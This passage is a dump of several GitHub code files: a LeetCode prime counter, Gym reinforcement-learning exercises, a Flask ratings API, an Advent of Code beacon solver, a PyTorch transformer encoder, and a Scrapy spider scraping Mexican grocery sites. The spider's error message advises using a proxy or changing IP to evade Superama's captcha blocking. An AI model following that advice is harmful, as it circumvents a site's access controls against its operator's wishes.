3, 5, 7.\n\n\nclass Solution(object):\n def countPrimes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n dp = [True] * n\n\n for i in range(2, int(n ** 0.5 + 1)):\n if dp[i]:\n # set times of i to False starting from i^2\n for time in range(i * i, n, i):\n dp[time] = False\n\n return len([1 for i in range(2, n) if dp[i] == True])\n\n\n# Appendix: is_prime implementation\ndef is_prime(n):\n for i in range(2, int(n ** 0.5 + 2)):\n if i < n and n % i == 0:\n return False\n\n return True\n","repo_name":"Frankiee/leetcode","sub_path":"math/count_number_up_to_n/204_count_primes.py","file_name":"204_count_primes.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13457857770","text":"from pyexpat import model\r\nfrom time import sleep\r\nimport gym\r\nimport numpy as np\r\nimport utils\r\nimport solutions\r\n\r\n\r\ndef problem_1(large=False, is_slippery=False, test=False):\r\n if large:\r\n env = gym.make('FrozenLake8x8-v1', is_slippery=is_slippery)\r\n else:\r\n env = gym.make('FrozenLake-v1', is_slippery=is_slippery)\r\n if test:\r\n with open(\"policy1.npy\", \"rb\") as f:\r\n policy = np.load(f)\r\n solutions.test_1(env, policy)\r\n return\r\n num_steps = env._max_episode_steps\r\n num_states = env.observation_space.n\r\n num_actions = env.action_space.n\r\n env_model = env.P\r\n gamma = 1.0\r\n q_pi = np.ones((num_states, num_actions)) / num_actions\r\n V, q = solutions.policy_iteration(env_model, q_pi, gamma=gamma)\r\n if input(\"Save policy? (y/n)\") == \"y\":\r\n with open(\"q_values1.npy\", \"wb\") as f:\r\n np.save(f, q)\r\n with open(\"policy1.npy\", \"wb\") as f:\r\n np.save(f, np.argmax(q, axis=1))\r\n # how to get from here to optimal?\r\n # add visualization: see mins 50-55\r\n if large:\r\n utils.plot_value_function(V.reshape(8,8))\r\n else:\r\n utils.plot_value_function(V.reshape(4,4))\r\n utils.plot_value_function(q)\r\n policy = np.argmax(q, axis=1)\r\n utils.plot_value_function(np.equal(q, np.max(q, axis=1, keepdims=True)))\r\n # with open(\"policy1.npy\", \"wb\") as f:\r\n # np.save(f, policy)\r\n\r\ndef problem_2():\r\n env = gym.make('FrozenLake8x8-v1', is_slippery=True)\r\n num_train_episodes = 5000\r\n num_eval_episodes = 50\r\n num_steps = env._max_episode_steps\r\n num_states = env.observation_space.n\r\n num_actions = env.action_space.n\r\n gamma = 1.0\r\n alpha = 0.1\r\n max_epsilon = 1.0\r\n min_epsilon = 0.01\r\n epsilon_decay_rate = 0.005\r\n eval_itrs = 50\r\n\r\n # Q Learning\r\n Q = np.ones((num_states, num_actions)) / num_actions\r\n # where does eval come in?\r\n Q = solutions.q_learning(env, Q, num_steps)\r\n utils.plot_value_function(Q)\r\n policy = np.argmax(Q, axis=1)\r\n utils.plot_value_function(np.equal(Q, np.max(Q, axis=1, keepdims=True)))\r\n\r\ndef problem_3a(plot=False):\r\n if plot:\r\n solutions.plot3()\r\n return\r\n env = gym.make('Acrobot-v1')\r\n env.reset()\r\n num_actions = env.action_space.n\r\n cos_theta1 = [-0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75]\r\n sin_theta1 = [0]\r\n cos_theta2 = [-0.75, -0.5, -0.25, 0, 0.25, 0.5, 0.75]\r\n sin_theta2 = [0]\r\n vel_theta1 = [-4, -2, -1, 0, 1, 2, 4]\r\n vel_theta2 = [-6, -3, -1.5, 0, 1.5, 3, 6]\r\n Q = np.zeros(((len(cos_theta1) + 1) * (len(sin_theta1) + 1) * (len(cos_theta2) + 1) * (len(sin_theta2) + 1) * (len(vel_theta1) + 1) * (len(vel_theta2) + 1), num_actions))\r\n # with open(\"q_values.npy\", \"rb\") as f:\r\n # Q = np.load(f)\r\n solutions.q_learning3a(env, Q, cos_theta1, sin_theta1, cos_theta2, sin_theta2, vel_theta1, vel_theta2)\r\n\r\ndef problem_3b(test=False):\r\n env = gym.make('MountainCar-v0')\r\n env.reset()\r\n # print(env.action_space)\r\n # print(env.observation_space)\r\n #problem_3b_experiment(env)\r\n num_actions = env.action_space.n\r\n # position_states = np.array([-0.9, -0.8, -0.7, -0.64, -0.62, -0.6, -0.59, -0.58, -0.57, -0.56 -0.55, -0.53, -0.5, -0.45, -0.4, -0.1])\r\n # velocity_states = np.array([-0.02, -0.01, -0.005, -0.003, -0.001, 0, 0.001, 0.003, 0.005, 0.01, 0.02, 0.03])\r\n position_states = np.array([-0.95, -0.7, -0.58, -np.pi/6, -0.47, -0.35 -0.1])\r\n velocity_states = np.array([-0.02, 0, 0.02])\r\n # position_states = [-0.8, -0.6, -0.4]\r\n # velocity_states = [-0.01, 0, 0.02]\r\n #velocity_states = [0]\r\n Q = np.zeros(((len(position_states) + 1) * (len(velocity_states) + 1), num_actions))\r\n with open(\"q_values_3b.npy\", \"rb\") as f:\r\n Q = np.load(f)\r\n if test:\r\n solutions.test_3b(env, Q, position_states, velocity_states)\r\n else:\r\n solutions.q_learning3b(env, Q, position_states, velocity_states)\r\n\r\nimport matplotlib.pyplot as plt\r\ndef problem_3b_experiment(env, num_samples=10000):\r\n samples = np.zeros((num_samples, 2))\r\n\r\n for n in range(num_samples):\r\n print(env.step(np.random.choice([0, 1, 2], p=[0.4,0.4,0.2])))\r\n samples[n] = env.state\r\n plt.hist(samples[:, 0])\r\n plt.show()\r\n plt.figure()\r\n plt.hist(samples[:,1])\r\n plt.show()\r\n print(np.max(samples, axis=0), np.min(samples, axis=0))\r\n\r\n\r\n\r\n# problem_1(large=True, is_slippery=True, test=False)\r\n#problem_2()\r\nproblem_3a()\r\n# problem_3b()\r\n","repo_name":"ethanglaser/Intelligent-Autonomous-Systems","sub_path":"Project4/project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27948920222","text":"from flask import request\nfrom flask_restful import Resource\nfrom http import HTTPStatus\nfrom models.user import User\nfrom models.item import Item\nfrom models.rating import Rating\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom schemas.rating import RatingSchema\nfrom resources.util import item_not_found\n\nrating_schema = RatingSchema()\nrating_list_schema = RatingSchema(many=True)\n\n\nclass RatingListResource(Resource):\n # GET-metodilla haetaan itemin kaikki ratingit\n def get(self, item_id):\n item = Item.get_by_id(item_id=item_id)\n if item is None:\n return item_not_found()\n ratings = Rating.get_by_item(item_id=item.id)\n return rating_list_schema.dump(ratings).data, HTTPStatus.OK\n\n # POST-metodi ratingin luomiseen\n @jwt_required\n def post(self, item_id):\n json_data = request.get_json()\n current_user = get_jwt_identity()\n data, errors = rating_schema.load(data=json_data)\n item = Item.get_by_id(item_id=item_id)\n\n if errors:\n return {\"message\": \"Validation errors\", \"errors\": errors}, HTTPStatus.BAD_REQUEST\n\n if Rating.get_by_user_item(user_id=current_user, item_id=item.id) is not None:\n return {\"message\": \"You have already rated this item\"}\n\n rating = Rating(**data)\n rating.user_id = current_user\n rating.item_id = item.id\n rating.save()\n\n update_ratings(item_id=item.id)\n\n return rating_schema.dump(rating).data, HTTPStatus.CREATED\n\n # Patch-metodi olemassa olevan ratingin muuttamiseen\n @jwt_required\n def patch(self, item_id):\n json_data = request.get_json()\n current_user = get_jwt_identity()\n data, errors = rating_schema.load(data=json_data, partial=(\"name\", ))\n item = Item.get_by_id(item_id=item_id)\n\n if errors:\n return {\"message\": \"Validation errors\", \"errors\": errors}, HTTPStatus.BAD_REQUEST\n\n if item is None:\n return item_not_found()\n\n if current_user != item.user_id:\n return {\"message\": \"Access not allowed\"}, HTTPStatus.FORBIDDEN\n\n rating = Rating.get_by_user_item(user_id=current_user, item_id=item.id)\n\n rating.rating = data.get(\"rating\") or rating.rating\n rating.rating_text = data.get(\"rating_text\") or rating.rating_text\n\n rating.save()\n\n update_ratings(item_id=item.id)\n\n return rating_schema.dump(rating).data, HTTPStatus.OK\n\n\n# Funktio ratingien päivittämiseen\ndef update_ratings(item_id):\n # itemiin liittyvät muuttujat\n item = Item.get_by_id(item_id=item_id)\n ratings = Rating.get_by_item(item_id=item_id)\n i_rating = 0.0\n r = 0\n # useriin liittyvät muuttujat\n user = User.get_by_id(id=item.user_id)\n user_items = Item.get_all_by_user(user_id=item.user_id)\n u_rating = 0.0\n ru = 0\n\n # lasketaan itemin ratingien keskiarvo\n for rating in ratings:\n r = r + 1\n i_rating = i_rating + rating.__dict__[\"rating\"]\n\n i_rating_dict = {\"rating\": i_rating / r}\n item.rating = i_rating_dict.get(\"rating\")\n\n # lasketaan userin kaikkien itemien ratingien keskiarvo\n for rating in user_items:\n if rating.__dict__[\"rating\"] is None:\n continue\n ru = ru + 1\n u_rating = u_rating + rating.__dict__[\"rating\"]\n\n u_rating_dict = {\"rating\": u_rating / ru}\n user.rating = u_rating_dict.get(\"rating\")\n\n # tallennetaan muutokset\n item.save()\n user.save()\n","repo_name":"JarkkoJake/Application-programming","sub_path":"resources/rating.py","file_name":"rating.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22078011357","text":"import numpy as np\nfrom scipy.spatial.distance import pdist\nfrom itertools import combinations, compress\n\n\ndef read_data(data_path):\n \"\"\"\n Reads data\n \"\"\"\n\n # Define read parameters\n data = {}\n read = False\n sc_num = None\n scanner = None\n\n # Read input\n f = open(data_path, \"r\")\n for x in f:\n if len(x.strip()) == 0:\n read = False\n data[sc_num] = np.array(scanner)\n if read:\n scanner.append([int(i) for i in x.strip().split(\",\")])\n if x.strip().startswith(\"---\"):\n read = True\n sc_num = int(x.strip().split(\" \")[2])\n scanner = []\n\n # Save last scanner data\n data[sc_num] = np.array(scanner)\n return data, scanner\n\n\ndef get_comb_search(max_beacons):\n \"\"\"\n Calculates dictionary of combination numbers C(n, 2) for search\n \"\"\"\n comb = {}\n for i in range(1, max_beacons + 1):\n comb[int(i * (i - 1) / 2)] = i\n return comb\n\n\ndef calculate_distances(data):\n \"\"\"\n Calculates distances between beacons per scanner\n \"\"\"\n # calculate distances\n distances = {}\n for sc in data:\n distances[sc] = pdist(data[sc])\n return distances\n\n\ndef get_common_beacons(distances, comb):\n \"\"\"\n Calculate number of beacons in common between two scanners\n \"\"\"\n similarities = {}\n for i in distances:\n for j in distances:\n if i > j:\n simil = [di in distances[j] for di in distances[i]]\n if sum(simil) in comb:\n similarities[(i, j)] = comb[sum(simil)]\n return similarities\n\n\ndef beacons_map(i, j, distant, data):\n \"\"\"\n Get mappings between beacons from the point of view of scanners i and j\n \"\"\"\n\n # Get combinations for distances\n dist_idx_i = list(combinations(range(data[i].shape[0]), 2))\n dist_idx_j = list(combinations(range(data[j].shape[0]), 2))\n\n # Create mappings\n mappings = []\n for sc_i in range(data[i].shape[0]):\n dists_sc_i = distant[i][[sc_i in idx_i for idx_i in dist_idx_i]]\n mask_j = [dist_j in dists_sc_i for dist_j in distant[j]]\n if sum(mask_j) > 0:\n maps_j = list(sum(list(compress(dist_idx_j, mask_j)), ()))\n map_sc_i = [k for k in set(maps_j) if maps_j.count(k) > 1]\n if len(map_sc_i) > 1:\n print(f\"More than 1 point to map: {i}:{sc_i}, {j}:{map_sc_i}\")\n else:\n mappings.append((sc_i, map_sc_i[0]))\n return mappings\n\n\ndef get_coordinates(i, j, bmap, data):\n \"\"\"\n Get ordered coordinates for scanners i and j\n \"\"\"\n # Get positions\n pos_i = [bmap[map_id][0] for map_id in range(len(bmap))]\n pos_j = [bmap[map_id][1] for map_id in range(len(bmap))]\n crd_i = data[i][pos_i]\n crd_j = data[j][pos_j]\n return [crd_i, crd_j]\n\n\ndef get_coord_mapping(coord_pairs):\n \"\"\"\n Get coordinates mapping between scanners i and j\n \"\"\"\n # Search for appropriate pair difference\n was_matched = False\n for i in range(1, len(coord_pairs[0])):\n diff0 = coord_pairs[0][i] - coord_pairs[0][i - 1]\n diff1 = coord_pairs[1][i] - coord_pairs[1][i - 1]\n crd0 = [abs(a) for a in diff0]\n crd1 = [abs(a) for a in diff1]\n if len(set(crd0)) == 3 and set(crd0) == set(crd1) and (0 not in set(crd1)):\n was_matched = True\n break\n\n # Get order and sign mapping for selected scanners\n if not was_matched:\n print(\"Trouble getting coordinate mapping\")\n else:\n order = [crd1.index(k) for k in crd0]\n diff1_ord = diff1[order]\n sign = [1 if diff0[k] == diff1_ord[k] else -1 for k in range(3)]\n\n return [order, sign]\n\n\ndef recalculate_data(data, i, j, order, sign, bc):\n \"\"\"\n Recalculates data (reorders and changes sign), returns scanner position\n \"\"\"\n data[j] = data[j][:, order]\n for k in range(3):\n data[j][:, k] = data[j][:, k] * sign[k]\n\n # Calculates scanner coordinates\n scanner = data[i][bc[0]] - data[j][bc[1]]\n\n # Recalculation to first scanner\n for k in range(3):\n data[j][:, k] = data[j][:, k] + scanner[k]\n\n return data, scanner\n\n\ndef relativise_data(common, limit_pairs, data, distant):\n \"\"\"\n Identify relative positions of scanners to scanner 0\n \"\"\"\n\n known = [0]\n scanners = {0: [0, 0, 0]}\n pairs = [c for c in common if common[c] >= limit_pairs]\n\n while len(known) < len(data):\n for (p1, p2) in pairs:\n if sum([p1 in known, p2 in known]) == 1:\n p_unkno = p1 if p2 in known else p2\n p_known = p1 if p1 in known else p2\n known.append(p_unkno)\n\n # Get mappings between beacons\n beacon_map = beacons_map(p_known, p_unkno, distant, data)\n coord_pairs = get_coordinates(p_known, p_unkno, beacon_map, data)\n order, sign = get_coord_mapping(coord_pairs)\n\n # Rearrange and transform the data of the scanner to be added\n data, scanners[p_unkno] = recalculate_data(\n data, p_known, p_unkno, order, sign, beacon_map[0]\n )\n\n return scanners, data\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n limit_pairs = 12\n data, scanner = read_data(data_path)\n max_beacons = max([len(i) for i in data.values()])\n\n # Get beacons in common between two scanners\n comb = get_comb_search(max_beacons)\n distant = calculate_distances(data)\n common = get_common_beacons(distant, comb)\n\n # Recalculate data\n scanners, data = relativise_data(common, limit_pairs, data, distant)\n\n # Get unique beacons from recalculated coordinates\n output = set()\n for i in range(len(data)):\n output = output.union(set([tuple(a) for a in data[i]]))\n\n print(f\"There are {len(output)} different beacons on the map\")\n\n # Get max scanner distance\n max_dist = 0\n for i in scanners:\n for j in scanners:\n if i > j:\n dist = sum([abs(scanners[i][k] - scanners[j][k]) for k in range(3)])\n max_dist = max(max_dist, dist)\n\n print(f\"Farthest scanners are {max_dist} units apart\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_19/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38420288504","text":"import copy\nfrom typing import Optional\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\nfrom torch.nn import MultiheadAttention\n\nclass Encoder(nn.Module):\n\n def __init__(self, d_model=2048, nhead=4, num_encoder_layers=1,\n num_decoder_layers=2, dim_feedforward=8192, dropout=0.1,\n ):\n super().__init__()\n\n self.num_encoder_layers = num_encoder_layers\n\n #############################################################################################\n encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n encoder_norm = None\n self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n #############################################################################################\n decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout)\n decoder_norm = nn.LayerNorm(d_model)\n self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, decoder_norm)\n #############################################################################################\n self._reset_parameters()\n\n self.d_model = d_model\n self.nhead = nhead\n\n self.rm_self_attn_dec_func()\n\n def rm_self_attn_dec_func(self):\n total_modifie_layer_num = 0\n rm_list = []\n for idx, layer in enumerate(self.decoder.layers):\n \n layer.omit_selfattn = True\n del layer.self_attn\n del layer.dropout1\n del layer.norm1\n\n total_modifie_layer_num += 1\n rm_list.append(idx)\n\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, src, query_embed, pos_embed, mask=None):\n bs, c, h, w = src.shape\n src = src.flatten(2).permute(2, 0, 1) \n pos_embed = pos_embed.flatten(2).permute(2, 0, 1)\n query_embed = query_embed.unsqueeze(1).repeat(1, bs, 1)\n if mask is not None:\n mask = mask.flatten(1)\n\n \n if self.num_encoder_layers > 0:\n memory = self.encoder(src, src_key_padding_mask=mask, pos=pos_embed)\n else:\n memory = src\n\n tgt = torch.zeros_like(query_embed)\n hs = self.decoder(tgt, memory, memory_key_padding_mask=mask,\n pos=pos_embed, query_pos=query_embed)\n \n return hs.transpose(1, 2), memory[:h*w].permute(1, 2, 0).view(bs, c, h, w)\n\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, encoder_layer, num_layers, norm=None):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, src,\n mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n output = src\n\n for layer in self.layers:\n output = layer(output, src_mask=mask,\n src_key_padding_mask=src_key_padding_mask, pos=pos)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n\n\nclass TransformerDecoder(nn.Module):\n\n def __init__(self, decoder_layer, num_layers, norm=None):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n output = tgt\n\n for layer in self.layers:\n output = layer(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,\n pos=pos, query_pos=query_pos) \n\n if self.norm is not None:\n output = self.norm(output)\n\n return output.unsqueeze(0)\n\n\nclass TransformerEncoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1):\n super().__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n self.activation = F.relu\n\n self.debug_mode = False\n self.debug_name = None\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self,\n src,\n src_mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(src, pos)\n src2, corr = self.self_attn(q, k, value=src, attn_mask=src_mask,\n key_padding_mask=src_key_padding_mask)\n \n\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n src = src + self.dropout2(src2)\n src = self.norm2(src)\n return src\n\n def forward(self, src,\n src_mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None):\n return self.forward_post(src, src_mask, src_key_padding_mask, pos)\n\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1):\n super().__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.dropout3 = nn.Dropout(dropout)\n\n self.activation = F.relu\n\n\n self.debug_mode = False\n self.debug_name = None\n self.omit_selfattn = False\n\n def with_pos_embed(self, tensor, pos: Optional[Tensor]):\n return tensor if pos is None else tensor + pos\n\n def forward_post(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n q = k = self.with_pos_embed(tgt, query_pos)\n\n if not self.omit_selfattn:\n tgt2, sim_mat_1 = self.self_attn(q, k, value=tgt, attn_mask=tgt_mask,\n key_padding_mask=tgt_key_padding_mask)\n\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n tgt2, sim_mat_2 = self.multihead_attn(query=self.with_pos_embed(tgt, query_pos),\n key=self.with_pos_embed(memory, pos),\n value=memory, attn_mask=memory_mask,\n key_padding_mask=memory_key_padding_mask)\n \n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n\n tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout3(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward(self, tgt, memory,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None,\n pos: Optional[Tensor] = None,\n query_pos: Optional[Tensor] = None):\n return self.forward_post(tgt, memory, tgt_mask, memory_mask,\n tgt_key_padding_mask, memory_key_padding_mask, pos, query_pos)\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef build_encoder(args):\n return Encoder(d_model=args.hidden_dim)\n","repo_name":"milkxie/SPML-LAC","sub_path":"lib/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":9162,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"1936418305","text":"import csv\n\nimport json\n\nimport scrapy\n\nfrom ..items import Product, Branch\n\nproductsUPC = []\nproducts = []\nbranches = []\n\n\nclass YemaSpider(scrapy.Spider):\n\n name = 'startSpider'\n\n allowed_domains = ['lacomer.com.mx', 'superama.com.mx']\n\n blocked_request = 0\n\n start_urls = [\n 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/header/inicio?cambioSucc=false&succFmt=200&succId=409',\n 'https://www.superama.com.mx/common/GetMenu?storeId=9999/'\n ]\n\n def closed(self, reason):\n with open(\"products.csv\", \"w\", newline=\"\") as f:\n writer = csv.DictWriter(f, ['upc_gtin', 'brand', 'name', 'description', 'ingredients', 'package'])\n writer.writeheader()\n for data in products:\n writer.writerow(data)\n\n with open(\"branches.csv\", \"w\", newline=\"\") as f:\n writer = csv.DictWriter(f, ['product_id', 'chain', 'branch', 'price', 'category', 'product_url'])\n writer.writeheader()\n for data in branches:\n writer.writerow(data)\n\n print('=================================== RESUME ===================================')\n print('number of products ', len(products))\n print('number of branches ', len(branches))\n print('number of blocked request', self.blocked_request)\n print('PD. superama.com.mx return html view with a captcha, so json.loads crashing, that\\'s why requests are block ')\n print('==========================================================================================')\n\n def parse(self, response):\n # lacomer parse\n if 'lacomer.com.mx' in response.url:\n print(\"Surfing in lacomer.com.mx\")\n apartments = self.get_available_apartments(response)\n for apartment in apartments:\n url = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/pasilloestrucutra/totalarticulospasillo?agruId=' \\\n + str(apartment['id']) \\\n + '&succId=409'\n\n yield scrapy.Request(url, callback=self.parse_apartment,\n meta={'apartment_name': apartment['name'], 'apartment_id': apartment['id']})\n\n else:\n # superama parse\n print(\"Surfing in superama.com.mx\")\n apartments = self.get_available_apartments_family_line_superama(response)\n if len(apartments) > 0:\n for apartment in apartments:\n _apartment = apartment['apartment']\n _family = apartment['family']\n _line = apartment['line']\n url = 'https://www.superama.com.mx/buscador/resultadopaginadobeta?busqueda=' \\\n '&departamento=' + _apartment['seoUrlName'] + \\\n '&familia=' + _family['seoUrlName'] + \\\n '&linea=' + _line['seoUrlName'] + \\\n '&storeid=9999' \\\n '&IsLoggedUser=false' \\\n '&start=0' \\\n '&rows=300'\n\n yield scrapy.Request(url, callback=self.parse_apartments_family_line_superama)\n else:\n self.print_error(response)\n\n # lacomercial control\n\n def get_available_apartments(self, response):\n\n _apartments = []\n _notFood = [734, 93, 1328, 57, 87, 1215, 733, 53, 732, 78, 100, 949, 1, 1291, 50]\n\n _content = response.body\n _content = json.loads(_content)\n _content = _content[\"departamentos\"]\n for _apartment in _content:\n _apartment = _apartment.split(':')\n if len(list(filter(lambda x: x == int(_apartment[0]), _notFood))) == 0:\n _apartments.append({\n 'id': _apartment[0],\n 'name': _apartment[1]\n })\n\n return _apartments\n\n def parse_apartment(self, response):\n _name = response.meta.get('apartment_name')\n _id = response.meta.get('apartment_id')\n _content = response.body\n _content = json.loads(_content)\n _categories = _content['vecHijos']\n for _category in _categories:\n url = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/articulopasillo/articulospasillord?filtroSeleccionado=0' \\\n '&idPromocion=0' \\\n '&marca=' \\\n '&noPagina=1' \\\n '&numResultados=20' \\\n '&orden=-1' \\\n '&padreId=' + str(_category['agruId']) + \\\n '&parmInt=1' \\\n '&pasId=' + str(_id) + \\\n '&pasiPort=0' \\\n '&precio=' \\\n '&succId=409'\n\n yield scrapy.Request(url, callback=self.parse_product, meta={\n 'apartment': {'name': _name, 'id': _id},\n 'category': {'name': _category['agruDes'], 'id': _category['agruId']},\n })\n\n def parse_product(self, response):\n\n _products = response.body\n _products = json.loads(_products)\n _apartmentID = response.meta.get('apartment').get('id')\n _apartmentName = response.meta.get('apartment').get('name')\n _categoryID = response.meta.get('category').get('id')\n _categoryName = response.meta.get('category').get('name')\n\n for _product in _products['vecArticulo']:\n _urlProduct = 'https://www.lacomer.com.mx/lacomer/#!/detarticulo/' \\\n + str(_product['artEan']) + '/0/' + str(_apartmentID) + '/1///' \\\n + str(_apartmentID) + '?succId=409&succFmt=200'\n\n _upc = _product['artEan'][:-1]\n _upc = _upc.rjust(13, '0')\n\n if len(list(filter(lambda x: x == str(_upc), productsUPC))) == 0:\n _newProduct = Product()\n _newProduct['upc_gtin'] = _upc\n _newProduct['brand'] = _product['marDes']\n _newProduct['name'] = _product['artDestv']\n _newProduct['description'] = _product['artDes']\n _newProduct['ingredients'] = None\n _newProduct['package'] = str(_product['artUco']) + ' ' + str(_product['artTun'])\n yield _newProduct\n products.append(_newProduct)\n productsUPC.append(_upc)\n\n _newBranch = Branch()\n _newBranch['product_id'] = _upc\n _newBranch['chain'] = 'City Market'\n _newBranch['branch'] = 409\n _newBranch['price'] = '$' + str(_product['artPrven'])\n _newBranch['category'] = _apartmentName\n _newBranch['product_url'] = _urlProduct\n yield _newBranch\n branches.append(_newBranch)\n\n # superama control\n\n def get_available_apartments_family_line_superama(self, response):\n\n _apartments = []\n _notFood = ['_vinos_y_licores', 'd_jugos_y_bebidas', 'd_farmacia',\n 'd_lavanderia_hogar_y_mascotas', 'd_higiene_personal_y_belleza',\n 'd_bebes']\n\n try:\n _content = response.body\n _content = json.loads(_content)\n _content = _content['MenuPrincipal'][0]['Elements']\n for _apartment in _content:\n _nameApartment = _apartment['departmentName']\n if len(list(filter(lambda x: x == str(_nameApartment), _notFood))) == 0:\n for _family in _apartment['Elements']:\n for _line in _family['Elements']:\n _apartments.append({\n 'apartment': _apartment,\n 'family': _family,\n 'line': _line\n })\n\n except ValueError:\n self.print_error(response)\n _apartments = []\n\n return _apartments\n\n def parse_apartments_family_line_superama(self, response):\n try:\n _products = response.body\n _products = json.loads(_products)\n _products = _products['Products']\n for _product in _products:\n _upc = _product['Upc']\n url = 'https://www.superama.com.mx/consultar/pdp?upc=' + str(_upc) + '&store=9999'\n yield scrapy.Request(url, callback=self.parse_product_superama)\n except ValueError:\n self.print_error(response)\n\n def parse_product_superama(self, response):\n try:\n _product = response.body\n _product = json.loads(_product)\n _path = _product['UrlProducto']\n _urlProduct = 'https://www.superama.com.mx' + _path\n _upc = _product['Upc'].rjust(13, '0')\n\n if len(list(filter(lambda x: x == str(_upc), productsUPC))) == 0:\n _newProduct = Product()\n _newProduct['upc_gtin'] = _upc\n _newProduct['brand'] = _product['Brand']\n _newProduct['name'] = _product['Description']\n _newProduct['description'] = _product['Details']\n _newProduct['ingredients'] = _product['Ingredients']\n _newProduct['package'] = None\n yield _newProduct\n products.append(_newProduct)\n productsUPC.append(_upc)\n\n _newBranch = Branch()\n _newBranch['product_id'] = _upc\n _newBranch['chain'] = 'Superama'\n _newBranch['branch'] = 9999\n _newBranch['price'] = _product['PriceString']\n _newBranch['category'] = _product['SeoDisplayLineaUrlName']\n _newBranch['product_url'] = _urlProduct\n\n yield _newBranch\n branches.append(_newBranch)\n\n except ValueError:\n self.print_error(response)\n\n def print_error(self, response):\n # superama.com.mx return html view with a captcha, so json.loads crash\n self.blocked_request = self.blocked_request + 1\n print('#', self.blocked_request,\n ' : The request was blocked by superama.com.mx, please use a proxy, change IP or take a rest',\n '\\n',\n 